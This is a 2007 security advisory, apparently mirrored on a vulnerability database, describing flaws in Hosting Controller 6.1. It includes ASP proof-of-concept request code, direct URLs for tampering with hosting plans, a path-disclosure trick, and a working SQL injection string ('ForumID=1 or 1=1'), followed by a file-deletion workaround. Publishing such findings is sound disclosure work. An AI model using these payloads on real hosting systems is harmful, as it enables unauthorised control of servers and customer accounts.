&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xml.Open&nbsp;&quot;Get&quot;,&nbsp;&quot;http://localhost:8077/hosting/css.asp?AutoHost=resadmin'&quot;,&nbsp;False
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'-------------------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;If

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xml.setRequestHeader&nbsp;&quot;lastCached&quot;,&nbsp;now()
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xml.setRequestHeader&nbsp;&quot;Content-Type&quot;,&quot;application/x-www-form-urlencoded&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xml.Send&nbsp;TotalInputPOST
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;FileContent&nbsp;=&nbsp;xml.getResponseHeader(&quot;Content-Type&quot;)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strHtmlContent&nbsp;=&nbsp;xml.responseText
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i&nbsp;=&nbsp;instrrev(strHtmlContent,&quot;../common/SqlInject.asp&quot;)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;j&nbsp;=&nbsp;instrrev(strHtmlContent,&quot;size=2&gt;&quot;,i)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Response.Write(&quot;&lt;b&gt;&quot;&amp;mid(strHtmlContent,j+7,i-j-15)&amp;&quot;&lt;/b&gt;&quot;)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;%&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;%set&nbsp;oScriptNet=Server.CreateObject(&quot;Wscript.Network&quot;)%&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;br&nbsp;/&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;pre&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Computer&nbsp;Name:&nbsp;&lt;%=oScriptNet.ComputerName%&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;User:&nbsp;&lt;%=oScriptNet.UserName%&gt;&nbsp;&nbsp;&nbsp;(You&nbsp;are&nbsp;seeing&nbsp;this&nbsp;page&nbsp;by&nbsp;this&nbsp;user)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Both:&nbsp;\\&lt;%=oScriptNet.ComputerName%&gt;\\&lt;%=oScriptNet.UserName%&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;User&nbsp;Length=&lt;%If&nbsp;Len(oScriptNet.UserName)&lt;=20&nbsp;Then&nbsp;Response.Write(&quot;&nbsp;OK&nbsp;:)&quot;)&nbsp;Else&nbsp;Response.Write(&quot;&nbsp;False&nbsp;:(&nbsp;More&nbsp;than&nbsp;20&nbsp;chars&nbsp;so&nbsp;you&nbsp;must&nbsp;use&nbsp;from&nbsp;other&nbsp;username&nbsp;like&nbsp;ASPNET&quot;)%&gt;&lt;/pre&gt;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

12-&nbsp;[User]&nbsp;can&nbsp;import&nbsp;unwanted&nbsp;plan&nbsp;or&nbsp;change&nbsp;the&nbsp;plans.
&nbsp;12.1-&nbsp;To&nbsp;import&nbsp;a&nbsp;plan&nbsp;use&nbsp;&quot;http://[HC&nbsp;URL]/hosting/importhostingplans.asp&quot;&nbsp;directly.
&nbsp;&nbsp;&nbsp;&nbsp;12.2-&nbsp;To&nbsp;change&nbsp;a&nbsp;plan&nbsp;use&nbsp;something&nbsp;like&nbsp;&quot;http://[HC&nbsp;URL]/hosting/AutoSignUpPlans.asp?save=1&amp;30=ON&amp;d_30=1&quot;&nbsp;directly.

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

13-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;find&nbsp;web&nbsp;site&nbsp;path.
&nbsp;13.1-&nbsp;When&nbsp;forum&nbsp;is&nbsp;not&nbsp;available,&nbsp;or&nbsp;it&nbsp;is&nbsp;not&nbsp;default,&nbsp;&quot;http://[HC&nbsp;URL]/admin/forum/&quot;&nbsp;shows&nbsp;website&nbsp;path&nbsp;with&nbsp;an&nbsp;error.

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

14-&nbsp;[Remote&nbsp;Attacker]&nbsp;can&nbsp;enable&nbsp;or&nbsp;disable&nbsp;all&nbsp;Hosting&nbsp;Controller&nbsp;forums&nbsp;by&nbsp;SQL&nbsp;Injection.
&nbsp;14.1-&nbsp;This&nbsp;is&nbsp;because&nbsp;of&nbsp;a&nbsp;SQL&nbsp;Injection&nbsp;in&nbsp;&quot;/forum/HCSpecific/DisableForum.asp&quot;&nbsp;and&nbsp;&quot;/forum/HCSpecific/EnableForum.asp&quot;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;http://[HC&nbsp;URL]//forum/HCSpecific/DisableForum.asp?action=disableforum&amp;ForumID=1&nbsp;or&nbsp;1=1&quot;
&nbsp;&nbsp;&quot;http://[HC&nbsp;URL]//forum/HCSpecific/DisableForum.asp?action=disableforum&amp;ForumID=1&nbsp;or&nbsp;1=1&quot;

\\\\\\\\\\\\\\\\\\\\\
/////////////////////

15-&nbsp;[User]&nbsp;can&nbsp;change&nbsp;other's&nbsp;host&nbsp;headers.
&nbsp;15.1-&nbsp;This&nbsp;is&nbsp;because&nbsp;of&nbsp;&quot;/IIS/iibind.asp&quot;&nbsp;which&nbsp;accept&nbsp;the&nbsp;parameter&nbsp;without&nbsp;any&nbsp;checking.&nbsp;Also,&nbsp;this&nbsp;file&nbsp;has&nbsp;potential&nbsp;for&nbsp;dangerous&nbsp;SQL&nbsp;Injection.


####################
-&nbsp;Solution:
####################

Unfortunately,&nbsp;there&nbsp;is&nbsp;no&nbsp;support&nbsp;from&nbsp;hosting&nbsp;controller&nbsp;about&nbsp;these&nbsp;bugs.&nbsp;Also,&nbsp;they&nbsp;told&nbsp;us&nbsp;that&nbsp;there&nbsp;is&nbsp;no&nbsp;more&nbsp;support&nbsp;for&nbsp;HC&nbsp;6.1.
Fast&nbsp;Solution:
Delete&nbsp;or&nbsp;rename&nbsp;these&nbsp;files&nbsp;which&nbsp;are&nbsp;in&nbsp;&quot;Hosting&nbsp;Controller\web\admin\&quot;:
-&nbsp;&quot;/hosting/addreseller.asp&quot;
-&nbsp;&quot;/Accounts/AccountActions.asp&quot;
-&nbsp;&quot;/hosting/addsubsite.asp&quot;
-&nbsp;&quot;/hosting/xml_addresellerresult.asp&quot;
-&nbsp;&quot;/accounts/accountmanager.asp&quot;
-&nbsp;&quot;/fp2002/UNINSTAL.asp&quot;
-&nbsp;&quot;/OpenApi/GatewayVariables.asp&quot;
-&nbsp;&quot;/fp2000/NEWSRVR.asp&quot;
-&nbsp;&quot;/hosting/importhostingplans.asp&quot;
-&nbsp;&quot;/hosting/AutoSignUpPlans.asp&quot;
-&nbsp;&quot;/forum/HCSpecific/DisableForum.asp&quot;
-&nbsp;&quot;/forum/HCSpecific/EnableForum.asp&quot;
-&nbsp;&quot;/IIS/iibind.asp&quot;

Also,&nbsp;you&nbsp;can&nbsp;contact&nbsp;&quot;admin[4t}bugreport{d0t]ir&quot;&nbsp;to&nbsp;fix&nbsp;all&nbsp;these&nbsp;bugs&nbsp;for&nbsp;you&nbsp;without&nbsp;changing&nbsp;or&nbsp;deleting&nbsp;any&nbsp;file&nbsp;if&nbsp;you&nbsp;want.

####################
-&nbsp;Credit&nbsp;:
####################

AmnPardaz&nbsp;Security&nbsp;Research&nbsp;Team&nbsp;-&nbsp;www.Bugreport.ir
Contact:&nbsp;admin[4t}bugreport{d0t]ir

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Dec 2007 00:00Current
7.1High risk
Vulners AI Score7.1
hosting controllerremote attackerfull system admin accessexploitvulnerabilitiessql injectionresellersecurity bugs
42